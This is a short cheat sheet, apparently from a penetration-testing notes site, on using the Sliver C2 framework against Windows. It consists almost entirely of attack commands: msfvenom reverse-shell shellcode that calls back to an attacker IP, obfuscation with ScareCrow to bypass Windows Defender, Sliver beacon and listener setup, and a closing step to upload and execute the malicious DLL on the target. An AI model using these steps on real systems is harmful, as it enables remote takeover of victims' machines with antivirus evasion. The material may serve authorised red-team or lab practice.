Sliver C2
Install all post-exploitation tools
armory install allBypass Windows Defender
Generate a shellcode (with msfvenom).
msfvenom -p windows/x64/custom/reverse_winhttp LHOST=10.10.14.13 LPORT=9001 LURI=/hello.woff -f raw -o shellcode.binDownload ScareCrow (require Golang).
git clone https://github.com/optiv/ScareCrow.git
cd ScareCrow
go build .Obfusctate the shellcode with ScareCrow.
./ScareCrow -I shellcode.bin -Loader dll -nosignSetup Sliver C2.
profiles new beacon --arch amd64 --os windows --mtls 10.10.14.13:9000 -f shellcode --evasion --timeout 300 --seconds 5 --jitter 1 qu35t
stage-listener --url http://10.10.14.13:9001 --profile qu35t --prepend-size
mtls --lhost 10.10.14.13 --lport 9000
Upload and execute your malicious dll on the target machine.

Last updated